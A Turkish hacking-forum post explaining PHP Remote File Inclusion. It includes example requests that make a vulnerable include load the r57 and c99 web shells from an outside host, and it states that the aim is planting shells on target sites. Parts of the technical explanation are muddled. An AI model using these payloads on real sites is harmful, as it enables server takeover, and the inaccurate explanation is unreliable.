rfı açığı nedir_?buyrun içeri

atlas_tr

Kıdemli Üye
8 Ocak 2008
2,380
14
NErDe OLsam BEğeNİRsin
RFI Açığı Nedir ?
RFI
Remote File Include'nin kısaltılmışıdır. Türkçe olarak Uzaktan Dosya Çağırma anlamına gelmektedir.

RFI Açığı
sadece PHP sistemlerde bulunmaktadır. Çünkü RFI açığının mantığını oluşturan kodlar PHP'de bulunmaktadır.

RFI Mantığı ?
RFI açığını bir örnek üzerince incelersek mantığını daha iyi anlıyabilirsiniz.

Örneğin bir php script yazıyoruz.

index.php dosyamıza veritabanı dosyamızı çağıralım. Bunu gerçekleştirmek için gereken kodumuz;
PHP- Kodu:
include ("veritabani.php")


bu kodu içeren bir dosya aşağıdaki gibi işlem görür.

index.php?include=veritabanı.php

Yani include komu ile veritabanı.php dosyamızı çağırdık. İşte RFI'da mantığımız bu işlem görme şeklini kullanmaktır. Nasıl mı ?

Eğer yukarıdaki kodlama yapılırken
PHP- Kodu:
$path_to_folder="./"

vb.. bir kod eklenmez ise yani çağrılmak istenen dosya sadece veritabanı.php ile sınırlandırlmaz ise biz istediğimiz dosyayı çağırabiliriz ve çağırdığımız tüm dosyalar php olarak işlem görür. Bir txt dosyası çağırırsak bile .php olarak işlem görür.

Örnek:

index.php?include=http://www.turkhackteam.net/path/r57.txt?
index.php?include=http://www.turkhackteam.net/path/c99.txt?

vs. şeklinde istediğimiz dosyayı çağırabiliriz.


Genel olarak biz bu açığı hedef sitemize sh3LL yedirmek etmek için kullanıyoruz.
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.